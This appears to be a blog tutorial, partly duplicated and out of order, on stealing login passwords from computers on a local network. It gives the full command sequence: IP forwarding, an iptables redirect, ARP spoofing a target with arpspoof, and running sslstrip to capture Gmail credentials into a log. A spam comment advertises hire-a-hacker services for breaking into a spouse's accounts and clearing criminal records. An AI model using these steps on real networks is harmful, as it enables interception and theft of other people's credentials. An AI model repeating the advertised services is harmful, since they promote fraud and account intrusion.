// Introduction
In this tutorial we will use sslstrip for stealing password from any PC which is connected in LAN. SSLStrip basically hijacks HTTP traffic. Now a days its little difficult to steal password of some website.
// How to open
//* GUI Method
Application →Kali Linux → Information gathering → SSL Analysis → sslstrip
B. Open terminal type sslstrip –h this command will open sslstrip with help option
6. This command is use to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IPforwarding before this)
In this tutorial we will use sslstrip for stealing password from any PC which is connected in LAN. SSLStrip basically hijacks HTTP traffic. Now a days its little difficult to steal password of some website.
// How to open
//* GUI Method
Application →Kali Linux → Information gathering → SSL Analysis → sslstrip
B. Open terminal type sslstrip –h this command will open sslstrip with help option
Before startings SSLstrip we need to do some other works for trapping our target
a. IP forwarding
b. IP table for redirect 80 to 8080
c. Finding Gateway IP
d. Finding Target IP
e. Arpspoof
2. This command is used to enable IP forwarding.
Syntax :- echo ‘1’ > /proc/sys/net/ipv4/ip_forward
3. This command is use to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.
Syntax – iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080
4. This command is used to find out gateway IP.
Syntax:- netstat -nr
5. This is our Target OS Windows XP, by using ipconfig we got the target IP. I know you are thinking if I want to trap a unknown LAN PC then how will we find out the IP address. Well its not more difficult some Social engineering can do your job. Come to the point on sslstrip tutorial. So note down the target IP.
6. This command is use to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IPforwarding before this)
Syntax :- arpspoof –i interface –t target IP –r gateway Ip
Ex – arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2
7. Now we need to open a new terminal because this terminal is running arpspoof and we can’t stop it right now.
8. In new terminal use this command , This command is used to listening port. "-l" tells the system to listen on specified port.
Syntax:- sslstrip –l 8080
9. Now come to the target OS and open www.gmail.com and enter your username and password than click on sign in. Its normally like we are use for checking our gmail.
10. after clicking sign in on target os come to the attacker PC (Kali Linux). You will see sslstrip capture some data after finishing the capture press ctrl + C for stopping sslstrip. Data automatically save in a file named sslstrip.log.
11. Here use ls command so you can see the saved file as sslstrip.log
12. use cat and open your sslstrip.log file and watch carefully. Hmm there is your victim email id and password as shown in image.
Syntax:- cat sslstrip.log
That's It:-
image by :- geekyshows
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com